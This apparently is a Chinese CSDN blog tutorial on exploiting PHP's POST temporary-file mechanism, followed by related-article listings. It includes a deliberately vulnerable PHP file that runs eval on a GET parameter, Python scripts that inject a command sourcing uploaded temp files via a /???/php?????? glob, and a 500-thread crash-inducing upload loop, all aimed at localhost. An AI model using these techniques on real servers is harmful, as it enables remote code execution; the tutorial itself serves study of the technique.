利用 PHP POST 临时文件机制实现任意文件上传

已于 2022-04-20 16:53:05 修改
阅读量6.9k 收藏 5
点赞数 2
分类专栏: 经验分享 文章标签: 漏洞 php
于 2022-04-20 16:51:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36078992/article/details/124301392
版权

文章目录

原理

向 PHP 发送 Post 数据包,如果数据包中包含文件,无论 php 代码中有没有处理文件上传的逻辑,php 都会将这个文件保存为一个临时文件

  • 该文件默认存储在 /tmp 目录中『可通过 php.iniupload_tmp_dir 指定存储位置』
  • 文件名为 php[6个随机字符],例:phpG4ef0q
  • 若本次请求正常结束,临时文件会被自动删除
  • 若非正常结束,比如崩溃,临时文件可能会被永久保留

在这里插入图片描述

文件包含漏洞找不到可以利用的文件时,即可利用这个方法,找到临时文件名,然后包含之!

如何获取临时文件名

$_FILES

可以通过 $_FILES 获取文件信息

Array
(
    [name] => run.sh
    [full_path] => run.sh
    [type] => 
    [tmp_name] => /tmp/phpoFnbQf
    [error] => 0
    [size] => 10
)

phpinfo

phpinfo 页面会将当前请求上下文中所有变量都打印出来,若我们直接向 phpinfo页面送包含文件的 post请求,则即可在返回包里找到 $_FILES 变量的内容,从而拿到临时文件名

在这里插入图片描述

glob

若上述方法都无法实施,在 Linux 中,还可以通过 glob 通配符 定位文件

在这里插入图片描述

glob 简单使用:

  • * :代替 0 个或 任意个字符
  • ? :代替 1 个字符
  • [...]:匹配其中一个字符,例 [a,b,c] 匹配字符 a / b / c
  • {a, b}:匹配 a 或者 b

如何利用该文件

组合请求

虽然文件在请求结束后就自动删除了,但是我们可以把执行 shell 和 上传文件 组合在一个请求中,php 代码如下:

该 php 可以直接执行 shell, 但本例仅为展示如何利用临时文件

# a.php

<?php
	$code = $_GET['code'];
	eval($code);
?>

Python 脚本利用

# run.sh 文件内容:
# echo $PATH

import requests

# 上传文件同时,执行 shell
url = "http://localhost:8080/a.php?code=echo `. /???/php??????`;"

r = requests.post(url, files={'file': open('./run.sh')})

print(r.text)

# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

延长临时文件存在时间

部分情况下,我们无法将 上传文件执行shell 组合在一起,利用下述方法使得文件存在更多时间,从而在其他位置进行利用!

可以通过 文件包含 让 php 包含自身从而导致死循环,随后 php 守护进程会因内存溢出而崩溃,但是 php 自身是不会因为错误直接退出的,它会清空自己的内存堆栈,以便从错误中恢复,这就保证了 web 服务的正常运转。

同时该过程也会打断 php 对临时文件的处理,虽然最终仍会被删除,但相较之前可以明显看出临时文件在磁盘的中存在的时间变长了!

在这里插入图片描述

基于此,我们便可以编写并发脚本,不断发起 post 文件的请求

import requests
from threading import Thread

def test():
    url = "http://localhost:8080/include.php?file=include.php"
    r = requests.post(url, files={'file': open('./run.sh')})
    print(r.text)

lst = []
for _ in range(500):
    t = Thread(target=test)
    lst.append(t)
    t.start()

for item in lst:
    item.join()

可以看到,当我们在请求时,磁盘中总是存在尚未被删除的临时文件。直至请求停止,文件被全部删除

在这里插入图片描述

于此同时,便可以在其他地方使用上述 glob 路径通配符泛式加载临时文件

import requests

url = "http://localhost:8080/a.php?code=echo `. /???/php??????`;"

r = requests.get(url)

print(r.text)

# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

参考

zzzzls~
关注
专栏目录
PHP利用APC模块实现文件上传进度条的方法
10-24
利用PHP的APC模块,可以有效地实现服务器端的文件上传进度反馈,为用户提供更加友好的交互体验。 首先,APC(Alternative PHP Cache)是一个PHP优化代码缓存的扩展。它提供了一个高性能的缓存机制,通过缓存预编译...
使用post方法上传文件的两种做法
dichuan3337的博客
12-22 1281
项目需要使用HTTP协议中的POST方法上传文件,稍微总结了一下,将过程贴出来,方便以后参考。有两种方法,第一是使用NSMutableURLRequest完全从零开始设置,可以加深对HTTP协议的理解;第二种是直接使用别人封装好的代码,如AFNetworking。 方法一,从0开始文件上传 NSURL *url = [NSURL URLWithString:@"http://yo...
PHP实现文件上传
草根上的须子
06-07 2775
2、<input type="hidden" name="MAX_FILE_SIZE" value="values">进行文件大小的限制。如:<input type="hidden" name="MAX_FILE_SIZE" value="17760">输出一个二维数组,一维数组的myFile就是HTML中的type为file的input标签的name属性值;d、上传文件很大的配置:========关键字Resource==========) 函数使用一个字符串分割另一个字符串,并返回由字符串组成的数组。
基于PHP文件上传
最新发布
weixin_54799594的博客
08-23 1558
文件上传漏洞分析
PHP(12)文件上传
Fulling的博客
02-15 1659
PHP(12)文件上传 一、文件上传原理 二、表单写法 三、预定义变量 $_FILES 四、移动临时文件 五、多文件上传 1. 同名表单 2. 不同名表单 六、多文件处理 1. 同名文件 2. 不同名文件 七、封装文件上传函数
PHPPOST 方法上传
希望我的博客,能帮上你解决学习中工作中所遇到的问题
10-09 783
PHPPOST 方法上传
PHP文件上传
qq_63527808的博客
04-14 288
3、$_FILES[filename][tmp_name]:文件上传时,储存有在临时目录中保存为临时文件的文件名。5、$_FILES[filename][error]:存储文件上传的结果,若成功则返回 0;2、$_FILES[filename][size]:存储上传文件的大小,单位为字节;1、$_FILES[filename][name]:存储上传文件的文件名及其后缀;4、$_FILES[filename][type]:存储文件上传的类型;补:php 文件上传时,为什么需要在临时目录中保存成一个临时文件
PHP使用curl模拟post上传及接收文件的方法
10-22
PHP使用curl模拟post上传及接收文件的方法主要涉及利用PHP语言中的cURL库来模拟HTTP POST请求,从而实现文件上传到服务器以及从服务器接收文件的功能。在PHP中,cURL是一个强大的库,用于与服务器进行交互,它支持...
PHP使用curl请求实现post方式上传图片文件功能示例
10-18
主要介绍了PHP使用curl请求实现post方式上传图片文件功能,结合实例形式分析了php使用curl进行文件传输的相关设置与使用操作技巧,需要的朋友可以参考下
利用discuz实现PHP文件上传应用实例代码
10-30
- upload_tmp_dir:设置PHP在服务器上存储上传文件的临时目录,如果未指定则使用系统默认临时文件夹。 - upload_max_filesize:设置允许上传文件的最大大小,默认为2MB。 - post_max_size:限制通过POST方法传递...
PHP响应post请求上传文件的方法
10-23
流上下文最终被用于`file_get_contents`函数中,实现文件的上传。 在示例代码中,我们看到在开始添加每一部分的`Content-Disposition`头部前,会先添加边界字符串和换行符。然后,对于POST数据,我们指定字段名并留...
php上传文件产生的临时文件问题,以及所谓的资源类型到底是什么
铁柱的博客
07-02 4211
一、前言       上传图片的时候,如果要修改图片的后缀,那需要先获取该图片的临时存储文件,然后用GD库函数打开,获取图片资源,然后重新定义后缀存储,那么这个临时文件是什么呢,图片资源和咱们平时所用的文件资源又有什么区别呢?生成的临时文件不能用GD库函数读取怎么办? 二、首先是生成的临时文件不能被imagecreatefrompng()...
PHP文件上传、下载、删除、读取&写入)
fainpo的博客
03-18 3471
文件上传
PHP---文件上传
gaoqiandr的博客
01-01 3057
文件上传就是文件从用户本地电脑通过传输方式(web表单)保存到服务器所在电脑指定的目录下。 那么文件上传的原理是什么呢? 用户通过文件上传的表单从本地选择文件上传到服务器,服务器操作系统会将文件保存到临时文件夹中,注意是临时文件夹中,然后服务器开始工作,先判断文件是否有效,然后服务器脚本将有效文件从临时文件夹移动到指定目录下
详解HTTP的文件上传全过程(RFC1867协议)
青哥的博客
05-23 7484
经常用到GET, POST方法请求数据。GET请求最简单,而POST中常用的 `表单提交`,`JSON提交`也比较容易。自以为对 `TCP/HTTP` 协议理解透彻。而HTTP文件上传的原理,却还不懂,网上查了资料。其中涉及HTTP的RFC1867协议。
phpinfo包含临时文件Getshell全过程及源码
记录学习,一起进步
03-04 3519
phpinfo包含临时文件Getshell全过程及源码
PHP curl post提交file文件
0_0
03-18 1366
// 本地存储的图片,请求第三方接口,以post方式,数据提交 $path = storage_path('uploads/images/164733783162306167bfb3f945599302.png'); $data = array( 'file'=> new \CURLFile($path), ); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$url);//此处以当前服务器为接收地址 curl_setopt($ch, CURL
php post 文件,PHP响应post请求上传文件的方法
weixin_42476888的博客
03-09 301
function send_file($url, $post = '', $file = '') {$eol = "\r\n";$mime_boundary = md5 ( time () );$data = '';$confirmation = '';date_default_timezone_set ( "Asia/Shanghai" );$time = date ( "Y-m-d H:i:s...
php接收files文件post给api
u012794553的博客
03-31 778
实现目的: 根据业务需要,PHP作为中间层,需要从小程序端接收files文件,然后提交给api做业务逻辑处理(提交到华为云obs) PHP有个curl_file_create函数 需要先用curl_file_create — 创建一个 CURLFile 对象。 CURLFile curl_file_create ( string $filename [, string $mimetype [, string $postname ]] ) 参数 filename:上传文件的路径 mimetype:文件的Mi
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值